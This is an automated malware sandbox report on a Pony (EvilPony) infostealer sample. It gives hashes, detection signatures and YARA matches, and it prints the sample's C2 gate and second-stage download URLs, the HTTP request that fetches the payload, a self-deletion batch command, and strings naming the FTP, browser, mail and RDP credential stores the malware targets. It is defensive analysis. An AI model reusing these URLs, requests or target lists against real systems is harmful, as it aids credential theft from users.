Windows Analysis Report
BW38j8Jkbl.exe

Overview

General Information

Sample name: BW38j8Jkbl.exe
renamed because original name is a hash value
Original sample name: 2392a10406f41b602acbbdbbb24e0ff7.exe
Analysis ID: 1430559
MD5: 2392a10406f41b602acbbdbbb24e0ff7
SHA1: 9428ec3da5621a909d6cfc52ce3c6297aa97e8bb
SHA256: b593466df2eb855e58671d6f361c691e4be0f638f1fa17166965e613927684ea
Tags: exe, Pony

Detection

Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Generic Dropper
Yara detected Pony
C2 URLs / IPs found in malware configuration
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Machine Learning detection for sample
Pony trojan / infostealer detected
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: EvilPony, Ponyshe
Description: Privately modded version of the Pony stealer.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

AV Detection

Source: BW38j8Jkbl.exe Avira: detected
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack Malware Configuration Extractor: Pony {"C2 list": ["http://smartoffice-eg.com/include/rili/gate.php", "http://smartoffice-eg.com/include/rili/shit.exe"]}
Source: BW38j8Jkbl.exe ReversingLabs: Detection: 79%
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR
Source: BW38j8Jkbl.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree, 1_2_0040A712
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore, 1_2_0040D3BE
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA, 1_2_0040BC36
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,757283B0, 1_2_0040A557
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree, 1_2_0040A96D
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree, 1_2_0040CE3D
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree, 1_2_0040AB24
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004043DC CryptUnprotectData,LocalFree, 1_2_004043DC
Source: BW38j8Jkbl.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, 1_2_004051E3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_004041A6
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00404E73
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00408AE5
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00409832
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00408961
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Traffic Snort IDS: 2014562 ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 192.168.2.4:49730 -> 144.76.41.117:80
Source: Malware configuration extractor URLs: http://smartoffice-eg.com/include/rili/gate.php
Source: Malware configuration extractor URLs: http://smartoffice-eg.com/include/rili/shit.exe
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: global traffic HTTP traffic detected:
    GET /include/rili/shit.exe HTTP/1.0
    Host: smartoffice-eg.com
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: BW38j8Jkbl.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: smartoffice-eg.com
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://smartoffice-eg.com/include/rili/gate.php
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWD
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://smartoffice-eg.com/include/rili/shit.exe
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: BW38j8Jkbl.exe, 00000001.00000003.1802833837.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://smartoffice-eg.com/include/rili/shit.exe
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443

E-Banking Fraud

Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

System Summary

Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE Matched rule: Fareit Payload Author: kevoreilly
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Fareit Payload Author: kevoreilly
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Fareit Payload Author: kevoreilly
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE Matched rule: Fareit Payload Author: kevoreilly
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Fareit Payload Author: kevoreilly
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Fareit Payload Author: kevoreilly
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004121E9 1_2_004121E9
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00402EFD 1_2_00402EFD
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: String function: 00404351 appears 51 times
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: String function: 00401D71 appears 139 times
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: String function: 00410808 appears 42 times
Source: BW38j8Jkbl.exe, 00000000.00000000.1709686609.000000000049A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
Source: BW38j8Jkbl.exe, 00000001.00000000.1784937920.000000000049A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
Source: BW38j8Jkbl.exe Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
Source: BW38j8Jkbl.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@1/1
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore, 1_2_0040D3BE
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification, 1_2_00402968
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle, 1_2_00402CE7
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File created: C:\Users\user\AppData\Local\Temp\6000093.bat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
Source: BW38j8Jkbl.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BW38j8Jkbl.exe, 00000001.00000003.1791574250.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000003.1791503181.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BW38j8Jkbl.exe ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: msvbvm60.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: vb6zz.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: userenv.dll
